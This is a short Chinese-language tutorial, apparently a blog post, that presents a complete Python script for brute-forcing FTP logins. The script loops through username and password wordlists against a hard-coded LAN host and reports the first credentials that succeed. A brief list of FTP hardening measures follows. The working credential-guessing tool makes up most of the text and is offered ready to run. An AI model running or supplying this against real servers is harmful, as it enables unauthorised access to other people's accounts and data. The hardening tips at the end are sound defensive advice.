本篇是关于ftp的爆破实现。ftp爆破实现原理非常简单,利用ftplib组件,通过读取字典表username及password逐一尝试登录。
一、源代码
#-*- coding:utf8 -*-
import ftplib
def crackhandle(host,username,password):
try:
ftp = ftplib.FTP(host);
ftp.login(username,password);
ftp.quit();
return True;
except Exception as e:
print("login fail! username is %s password is %s" % (username,password));
pass;
def crack():
host ="192.168.1.108";
passwordsList = open("/root/Desktop/pythonTest/password.txt");
usernamesList = open("/root/Desktop/pythonTest/username.txt");
passwords = passwordsList.readlines();
usernames = usernamesList.readlines();
switch = False;
for usuername in usernames:
username = usuername.strip();
for password in passwords:
password = password.strip();
recv = crackhandle(host,str(username),str(password));
if recv:
print("success userName is %s password is %s" % (username,password));
switch = True;
break;
if switch:
break;
crack();
运行指令:python ftpcrack.py
效果图如下,可见通过爆破成功。
二、关于ftp的安全提升
1.从本地安全策略进行登录错误设置;
2.使用SSL加密;
3.用户权限设置合理化;
4.用户名及密码避免简单化;
5.匿名访问按需开启;